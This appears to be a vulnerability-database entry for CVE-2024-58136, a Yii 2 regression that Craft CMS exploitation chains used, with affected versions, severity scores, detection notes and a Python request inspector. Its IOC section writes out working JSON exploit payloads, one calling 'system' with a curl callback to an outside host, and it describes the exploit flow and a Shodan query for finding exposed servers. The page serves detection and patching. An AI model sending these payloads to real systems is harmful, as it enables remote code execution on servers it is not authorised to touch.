cbcvebase.
CVE-2024-58136
published 2025-04-10


Priority: P1 (90, critical) · CVSS 3.1: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Badges: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability (due 2025-05-23)
Exploited in the wild
EPSS: 87.71% (99.7th percentile)
Yii 2 before 2.0.52 mishandles the attaching of behavior that is defined by an __class array key, a CVE-2024-4990 regression, as exploited in the wild in February through April 2025.

Affected (4 ranges)

Vendor        Product   Version range               Fixed in
craftcms      cms       >= 4.0.0-RC1, < 4.16.17     4.16.17
craftcms      cms       >= 5.0.0-RC1, < 5.8.21      5.8.21
yiiframework  yii       < 2.0.52                    2.0.52
yiisoft       yii2      >= 0, < 2.0.52              2.0.52

Detection & IOCs (extracted from sources)

command: {"as hack": {"__class": "GuzzleHttp\\Psr7\\FnStream", "class": "yii\\behaviors\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream":"curl {{interactsh-url}}"}}
command: {"as hack": {"__class": "GuzzleHttp\\Psr7\\FnStream", "class": "yii\\behaviors\\AttributeBehavior", "__construct()": [[]], "_fn_close": "phpinfo"}}
url: POST /index.php HTTP/1.1 (with Content-Type: application/json and malicious __class JSON payload)
  • Detect HTTP POST requests to /index.php with Content-Type: application/json containing the '__class' key in the JSON body, specifically referencing 'GuzzleHttp\Psr7\FnStream' and Yii behavior classes — this is the exploit payload pattern for CVE-2024-58136.
  • Flag JSON bodies containing the key '__class' with value 'GuzzleHttp\Psr7\FnStream' combined with '_fn_close' set to 'system' or 'phpinfo' — these are the known exploit gadget chains.
  • The exploit chain requires CVE-2025-32432 to first write PHP code into a session file; then CVE-2024-58136 is triggered via a malicious JSON payload to execute that session file. Detect the combination of unusual session file creation followed by a JSON POST with '__class' key.
  • Post-exploitation indicator: look for newly uploaded PHP file manager files on the server following successful exploitation of this chain.
  • Use the Nuclei template flow: first confirm 'Yii' in the HTTP response body (GET /), then send the malicious JSON POST to /index.php. An HTTP callback to an interactsh URL or 'PHP Version'/'PHP Extension' in the response body confirms exploitation.
  • FOFA/Shodan exposure query: search for title='Yii' to identify potentially vulnerable internet-facing Yii2 instances for proactive patching or monitoring.
  • Craft CMS ships with Yii 2.0.51 (vulnerable) by default even after the CVE-2025-32432 patch; however, the full exploit chain is broken by the Craft CMS fix alone — the Yii vulnerability is not independently triggerable in patched Craft CMS deployments.
  • CVE-2024-58136 is a regression of CVE-2024-4990; environments that previously patched CVE-2024-4990 but have not upgraded to Yii 2.0.52 remain vulnerable.
  • This vulnerability affects any product implementing the Yii framework, not just Craft CMS — detection and patching scope should extend to all Yii-based applications.
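As an added example (not code from this page, Yii or Craft CMS), a small Python request inspector that implements the JSON-body checks from the bullets above: it flags any '__class' key in a POST application/json body and raises severity when the GuzzleHttp\Psr7\FnStream gadget appears together with a '_fn_close' sink. The sample bodies are constructed here to mirror the listed indicators, not captured traffic.

```python
import json
from typing import Any

# Indicator values from the detection notes on this page.
GADGET_CLASS = "GuzzleHttp\\Psr7\\FnStream"
GADGET_SINKS = {"system", "phpinfo"}

# Constructed sample bodies (not captured traffic) mirroring the indicators.
SAMPLE_BENIGN = r'{"user": {"name": "alice", "class": "premium"}}'
SAMPLE_CLASS_ONLY = r'{"as x": {"__class": "yii\\behaviors\\AttributeBehavior"}}'
SAMPLE_GADGET = (r'{"as hack": {"__class": "GuzzleHttp\\Psr7\\FnStream", '
                 r'"class": "yii\\behaviors\\AttributeBehavior", '
                 r'"__construct()": [[]], "_fn_close": "phpinfo"}}')


def _walk(node: Any, where: str, findings: list) -> None:
    """Recursively inspect decoded JSON for Yii '__class' behavior keys."""
    if isinstance(node, dict):
        if "__class" in node:
            cls, sink = node.get("__class"), node.get("_fn_close")
            if cls == GADGET_CLASS and isinstance(sink, str) and sink in GADGET_SINKS:
                findings.append(("high", f"{where}: FnStream gadget, _fn_close={sink}"))
            elif cls == GADGET_CLASS:
                findings.append(("medium", f"{where}: FnStream __class without known sink"))
            else:
                findings.append(("low", f"{where}: __class key with value {cls!r}"))
        for key, value in node.items():
            _walk(value, f"{where}/{key}", findings)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            _walk(value, f"{where}[{i}]", findings)


def inspect_request(method: str, path: str, content_type: str, body: str) -> list:
    """Return (severity, detail) findings for one HTTP request; [] if clean."""
    # The indicator pattern is a JSON POST; other requests are out of scope here.
    if method.upper() != "POST" or not content_type.lower().startswith("application/json"):
        return []
    try:
        data = json.loads(body)
    except ValueError:
        return []  # not JSON; nothing for this rule to inspect
    findings: list = []
    _walk(data, path, findings)
    return findings


if __name__ == "__main__":
    for name, body in [("benign", SAMPLE_BENIGN), ("class-only", SAMPLE_CLASS_ONLY),
                       ("gadget", SAMPLE_GADGET)]:
        print(name, inspect_request("POST", "/index.php", "application/json", body))
```

The path is not filtered on, since the last bullet notes that any Yii-based application, not only /index.php on Craft CMS, is in scope.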

CVSS provenance

nvd        v3.1  9.8  CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ghsa             9.1  CRITICAL
osv              9.1  CRITICAL
vulncheck        9.0  CRITICAL
cisa             9.8  CRITICAL